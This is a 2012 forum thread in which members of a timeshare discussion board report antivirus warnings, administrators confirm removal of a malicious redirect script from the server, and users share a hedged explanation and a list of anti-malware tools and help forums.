## ace2000 (Sep 9, 2012)

Makai Guy said:


> Please try it again now.


 
You've got a comment line that displays on the top of the page...

[comment line removed so as not to tip our hand to the bad guys]


----------



## SueDonJ (Sep 9, 2012)

ace2000 said:


> You've got a comment line that displays on the top of the page...
> 
> 
> [comment line removed so as not to tip our hand to the bad guys]



I'm seeing the same thing here.  If it matters, I didn't have any of the problems that others had.


----------



## Makai Guy (Sep 9, 2012)

ace2000 said:


> You've got a comment line that displays on the top of the page...
> 
> [comment line removed so as not to tip our hand to the bad guys]



Temporary while I'm messing around.  Will go away shortly.  Thanks for being alert and reporting it though -- next time might not be so benign.


----------



## Ken555 (Sep 9, 2012)

Picker57 said:


> Also wondering, are Mac users getting this also?
> 
> ------------Zach



I'm not on Mac or iPad.


----------



## DeniseM (Sep 9, 2012)

I'm not getting it on my MacBook Air.


----------



## Picker57 (Sep 9, 2012)

Makai Guy said:


> Please try it again now.



Doug - It was clean this time.  Thanks; stay tuned.   On another subject, I posted some comments & queries to your North Shore website.

      Mahalo nui loa,
                          -----------------Zach


----------



## Jaybee (Sep 9, 2012)

Ahh!  At last!  No more red flags from AVG!


----------



## Htoo0 (Sep 9, 2012)

Everything good here. Thanks so much!


----------



## pammex (Sep 15, 2012)

seems okay now...yeah!


----------



## MichaelColey (Sep 16, 2012)

So, was this a real virus then?


----------



## TUGBrian (Sep 16, 2012)

something was certainly on the server that shouldnt have been...but given all the people that reported the warning...and the fact so many others had no effects...(although one person did report actually getting something on their pc)...id have to say "I really dont know"  lol


----------



## timeos2 (Sep 16, 2012)

MichaelColey said:


> So, was this a real virus then?



There apparently was some type of script that, while in itself wasn't a virus or malware, was redirecting (or attempting to) requests to some type of malware source.  As it evolved I am sure that it took two parts to actually work. One was logging on to the TUG BBS but the other was local. IF your computer was already compromised by an underlying script or setting change by a malware or virus - not removed by your anti-virus or malware/spyware protections - then you got the warning (the otherwise benign script/program wasn't active until triggered by the login script) as your protections hopefully protected you from an ill-intentioned  process running that would actually trigger an infection. If you weren't so lucky then it actually would install the payload & now you have a completely compromised computer doing who knows what. 

It appears some products (such as Trend Micro, Avast! or Bitdefender & others) blocked the process or had never let it install as standard procedure and, unless you visited your log, it wasn't presenting any outward signs of an issue. Others, Norton, AVG etc were raising the flag and then blocked it but may have left the trigger on your computer. Both results are OK but the second is more troubling to the user.  Only those with no anti-virus (or an out of date one) were really at risk. 

At least that appears to be what occurred. There have been other sites with similar issues in the past that weren't as quick to respond & correct it as TUG. Kudos to the administrators that managed to track it down & correct it. Everyone is safer with it out of the system.  As for those that got the warnings I'd run the best cleanup software you can to try to identify any remotely questionable files / scripts on your computer. Something may be in there and waiting for the chance to be activated. It can't hurt to run a complete check to be sure. One that is very effective, and free, is the Security Tango found here. Just be ready to let it run for a few hours if you start it.


----------



## Makai Guy (Sep 16, 2012)

timeos2 said:


> It can't hurt to run a complete check to be sure. One that is very effective, and free, is the Security Tango found here. Just be ready to let it run for a few hours if you start it.



Some other malware finders/fixers:
Malwarebytes' Anti-Malware
SuperAntispyware
AdAware
Spybot Search & Destroy

Trying more than one is always a good idea, as no single program finds everything.

If you know you are infected and these programs don't find it or can't clear it, post in one of these forums for specialized malware removal help:
http://www.spywarewarrior.com/index.php
http://forum.aumha.org/
http://bleepingcomputer.com/
http://www.spywareinfoforum.com/

_Thanks to Daifne, Moderator on Mozillazine forums, for this list._


----------

